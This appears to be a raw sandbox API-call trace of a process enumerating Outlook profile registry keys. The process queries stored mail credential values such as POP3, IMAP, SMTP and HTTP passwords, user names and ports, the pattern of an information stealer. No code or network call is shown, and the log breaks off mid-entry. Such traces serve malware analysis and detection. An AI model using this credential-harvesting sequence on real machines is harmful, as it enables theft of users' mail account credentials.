0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.159] RegCloseKey (hKey=0x95c) returned 0x0 [0249.159] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.159] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.160] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.160] RegCloseKey (hKey=0x95c) returned 0x0 [0249.160] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.161] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.161] RegCloseKey (hKey=0x95c) returned 0x0 [0249.161] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\09917dd29831004f89474b112e58e0ab", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.162] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] LocalFree (hMem=0x5d68100) returned 0x0 [0249.162] RegEnumKeyExA (in: hKey=0x94c, dwIndex=0x2, lpName=0x1c4ef10, lpcchName=0x1c4f738, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="0a0d020000000000c000000000000046", lpcchName=0x1c4f738, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.162] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook") returned 55 [0249.162] LocalAlloc (uFlags=0x40, uBytes=0xd7) returned 0x5d67060 [0249.162] wsprintfA (in: param_1=0x5d67060, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046") returned 88 [0249.162] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.162] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.162] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.162] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.163] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.163] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.163] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.164] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.164] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.164] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.165] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.165] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.165] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.165] RegCloseKey (hKey=0x95c) returned 0x0 [0249.165] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.165] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, 